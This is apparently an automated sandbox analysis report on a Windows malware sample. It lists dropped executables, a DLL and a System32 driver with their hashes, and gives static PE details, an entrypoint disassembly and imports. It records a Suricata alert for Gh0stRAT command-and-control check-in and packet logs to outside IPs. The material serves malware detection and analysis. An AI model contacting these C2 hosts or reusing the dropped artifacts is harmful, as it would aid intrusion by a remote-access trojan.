Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Qn.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Users\user\Documents\WordpadFilter.db

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	GIF image data, version 89a, 10 x 10
Category:	dropped
Size (bytes):	8228
Entropy (8bit):	7.978965865518848
Encrypted:	false
SSDEEP:	192:hBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:hBuNhyTlBU2dp+1XrBuCgp9vU0l
MD5:	1D82551B9BFF49DC1F3E7ED6A922ACF1
SHA1:	02E2F7E8E67D4B9D5024CF8076A15EA6F695629E
SHA-256:	9F81221C5F37213DCEA53BBF0FCCE07EE0F379858C88734561A0B0980EC6A05B
SHA-512:	0D50E0E9BB7FD2C75E0318A76CEBEFBA7DB40A5694709495D9EA68E8F475F4AAC7C94A6BD45BE8BFFED341402DEA05609D1EC9C6D0EEF306FC48544F63864E13
Malicious:	false
Preview:	GIF89a.......,.L.........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6IX.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......\|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%...c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^\|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.\|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...\|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

C:\Users\user\Documents\qWXt7a.exe

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133136
Entropy (8bit):	6.350273548571922
Encrypted:	false
SSDEEP:	3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
MD5:	D3709B25AFD8AC9B63CBD4E1E1D962B9
SHA1:	6281A108C7077B198241159C632749EEC5E0ECA8
SHA-256:	D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
SHA-512:	625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#................P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...)......................... ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\vselog.dll

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	6.002071401931511
Encrypted:	false
SSDEEP:	1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52F2:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5g2
MD5:	64ACA93D4A83E150BF4FCD6193D1ACF6
SHA1:	13FECA389F642E157E4D187561B8B0021524F315
SHA-256:	42756E924D41DED7E2253C23FEEF8F52B0BC13A78D96B833295093F62DF8DC19
SHA-512:	2FFD3B5CC5E4DCD3F04BBD5268883A50182A669EE8817606B9485A0FFB1A45578761F3A4E073DA8524B9B3CDF19C38377EB82E462FCD17A89A71F9AEEED606C1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

C:\Windows\System32\drivers\189atohci.sys

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	6.229070968248613
Encrypted:	false
SSDEEP:	384:Y3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/K:YOUkgfdZ9pRyv+uPzCMHo3q4tDgh0
MD5:	E04B4532E9A6C2EAD3B3B3469C311D58
SHA1:	5962416158FF8A921C21721799D5DE1A62F85619
SHA-256:	50430D04DCB1E18354D0368DCC0A36EE313CB28C40248CFA1080DE8407C59A22
SHA-512:	F2ED48C23C4E847228FE8E2207FDCD26DFFA4A47F4754788AFDF67B53841EFA6103D9B4F09DFC5C606487DB68F575D756FBA5AA3D21C3FE7E1A37321C3681AEE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l..........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

C:\xxxx.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.424437428586092
Encrypted:	false
SSDEEP:	3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznll:ri9TDTwPYtyjtOsNaG4oi1xE
MD5:	137711DA4E9B110ECDBFD16C4B796301
SHA1:	1640F7B279E8B0CB4234E1C7D4D9473C16DF5819
SHA-256:	3FB5F0831F9336BD4C18014FA828703B8061E759FF8A0473C5490C0E3DD124FE
SHA-512:	3692BFA7F09012B70034830797ECC00C948C58E34A366790B87EB2FCB793F86E2E055A0EBC6B7EC0D49CDBB9DA0D7D418137A6925C93F26C0123C0D2D5A45923
Malicious:	false
Preview:	..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....6.d.V+fQ..^~..@9

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.706939537510779
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0000000000000000.exe
File size:	31'322'802 bytes
MD5:	4082e7b105c3e8adfa454f1b09890a2a
SHA1:	592725671389bbb3d2185f143b027f90dd89fc99
SHA256:	626b596d98fb4d517a9d154acaaaa215a185d13bf07d38fd1eb52940abe18e47
SHA512:	c6c0431e244c1d6e4d76c2f6cfd1493bcc8d3fa9a4b38d25769cc392c3b6b3f3d3017256c8f12bfb8d86c60107ef1560e312f7ecdc27db73905ace1b9a2a22d7
SSDEEP:	393216:CN/dn7U03/CiLJ+Rd1chCb9ayX888C88/888C88RagWjOapOTAVU3iwwB2PQ5gGV:M1Qnid+Rd2cpaCazKawRSEHfHo
TLSH:	64678C61EBFD6429F519E230789506035B11BA322D948F8B31E9511BAF5FAF37821BCC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................N..}....N&......N........;.......+.........W....N.......N%.....Rich............................PE..d...IG`S...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140008648
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x53604749 [Wed Apr 30 00:43:53 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1e161be7fbdd881c45e950d193fc5123

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F936C8088D0h
dec eax
add esp, 28h
jmp 00007F936C7FE7A8h
int3
int3
jmp 00007F936C805F24h
int3
int3
int3
inc eax
push edi
dec eax
sub esp, 20h
dec ebp
mov edx, eax
inc ebp
xor eax, eax
dec ebp
test ecx, ecx
jne 00007F936C805D56h
xor eax, eax
jmp 00007F936C805DB1h
dec eax
test ecx, ecx
jne 00007F936C805D67h
call 00007F936C806CCAh
mov edi, 00000016h
mov dword ptr [eax], edi
call 00007F936C80681Eh
mov eax, edi
jmp 00007F936C805D97h
dec ebp
test edx, edx
je 00007F936C805D65h
dec ecx
cmp edx, ecx
jc 00007F936C805D60h
dec edi
lea eax, dword ptr [ecx+ecx]
dec ecx
mov edx, edx
call 00007F936C805F2Ch
jmp 00007F936C805D1Ch
dec eax
test edx, edx
je 00007F936C805D5Fh
dec eax
mov edi, ecx
inc ecx
movzx eax, ax
dec eax
mov ecx, edx
rep stosw
dec ebp
test edx, edx
je 00007F936C805D0Eh
dec ecx
cmp edx, ecx
jnc 00007F936C805D5Eh
call 00007F936C806C81h
mov edi, 00000022h
jmp 00007F936C805D07h
mov eax, 00000016h
dec eax
add esp, 20h
pop edi
ret
int3
int3
dec eax
mov eax, ecx
movzx edx, word ptr [eax]
dec eax
add eax, 02h
test dx, dx
jne 00007F936C805D46h
dec eax
sub eax, ecx
dec eax
sar eax, 1
dec eax
dec eax
ret
int3
int3
int3
inc ebp
xor eax, eax
inc ecx
mov eax, eax
dec eax
test edx, edx
je 00007F936C805D64h
inc sp
cmp dword ptr [ecx], eax
je 00007F936C805D5Eh
dec eax
inc eax

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19ce0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x2d000	0x114c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2f000	0x49c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x15490	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x370	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13fe2	0x14000	c20d9d46b7b3eb8f831d655d85e5a9fa	False	0.54891357421875	data	6.395675641477077	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x587e	0x5a00	08a0e7c2e1600a90988913d408bf319d	False	0.3506076388888889	data	4.6498718652915825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x11570	0xd600	284f99746d4e580a54a08e4dc9c30661	False	0.8229227511682243	data	7.45334711777497	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x2d000	0x114c	0x1200	08481227273137773e4199c661066582	False	0.4657118055555556	data	4.797430394465479	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2f000	0x924	0xa00	dcf0d23a87862ba5dc86026f4c1f324a	False	0.26640625	data	3.293153499318879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOverridePredefKey, RegOpenKeyExW
KERNEL32.dll	GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleW, LCMapStringW, GetStringTypeW, RtlPcToFileHeader, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, QueryPerformanceCounter, HeapCreate, GetCommandLineW, lstrlenW, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, RaiseException, GetVersion, GetLastError, GetModuleHandleW, CloseHandle, GetCurrentProcess, LocalFree, SetLastError, GetTickCount, LoadLibraryW, GetProcAddress, GetEnvironmentVariableW, lstrcmpiW, FreeLibrary, VirtualQuery, GetModuleFileNameW, GetCurrentProcessId, GetCurrentThreadId, OutputDebugStringA, GetPrivateProfileIntW, GetPrivateProfileStringW, Sleep, CreateFileW, WriteFile, SetFilePointer, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, TryEnterCriticalSection, LeaveCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, GetSystemTimeAsFileTime, FlushFileBuffers, HeapSetInformation, TerminateProcess, IsDebuggerPresent, ExitProcess, GetStdHandle, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree, InitializeCriticalSectionAndSpinCount, HeapDestroy, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, GetProcessHeap, GetCommandLineA, GetStartupInfoW, DecodePointer, EncodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, RtlUnwindEx, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualAlloc, GetFileType, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc
SHLWAPI.dll	PathAppendW, PathRemoveExtensionW, PathRemoveFileSpecW, PathStripPathW
SHELL32.dll	CommandLineToArgvW
USER32.dll	CharLowerBuffW, wsprintfW, MessageBoxW, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T08:31:48.107706+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	50019	8.217.35.192	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 08:30:33.443301916 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:33.443346024 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:33.443439960 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:33.452507973 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:33.452523947 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:34.688386917 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:34.688460112 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:34.689119101 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:34.689167976 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:34.738497972 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:34.738537073 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:34.738781929 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:34.740744114 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:34.741931915 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:34.787328005 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:35.071084023 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:35.071139097 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.071141005 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:35.071192026 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.077138901 CET	49736	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.077167034 CET	443	49736	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:35.183470011 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.183514118 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:35.183579922 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.183795929 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:35.183813095 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.433604002 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.433661938 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.434144974 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.434154987 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.434351921 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.434356928 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.772242069 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.772259951 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.772325993 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.772345066 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.772383928 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.772767067 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.772815943 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.773963928 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.774019957 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.777909040 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.777962923 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.861471891 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.861505985 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.861542940 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.861557961 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.861577988 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.861599922 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.861812115 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.861859083 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.862253904 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.862298965 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.863054991 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.863104105 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.863495111 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.863543987 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.864648104 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.864692926 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.864830017 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.864881039 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.866782904 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.866849899 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.949683905 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.949717045 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.949764967 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.949774981 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.949801922 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.949826956 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.949894905 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.949975014 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950119019 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950165987 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950191021 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950197935 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950218916 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950234890 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950567007 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950597048 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950617075 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950622082 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.950642109 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.950654030 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951066017 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951093912 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951128006 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951133966 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951153994 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951164961 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951407909 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951453924 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951678991 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951710939 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951731920 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951736927 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.951759100 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.951766968 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.953461885 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.953495026 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.953516006 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.953520060 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.953542948 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.953552961 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.955476046 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.955532074 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:36.955617905 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:36.955674887 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038609982 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038642883 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038665056 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038672924 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038698912 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038716078 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038729906 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038758993 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038770914 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038774967 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038794994 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038815975 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038824081 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038851976 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.038870096 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.038892031 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.054630995 CET	49737	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.054651022 CET	443	49737	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.079905033 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.079940081 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:37.080027103 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.080284119 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:37.080298901 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.337358952 CET	443	49738	39.103.20.97	192.168.2.4
Jan 1, 2025 08:30:38.339489937 CET	49738	443	192.168.2.4	39.103.20.97
Jan 1, 2025 08:30:38.339900970 CET	49738	443	192.168.2.4	39.103.20.97
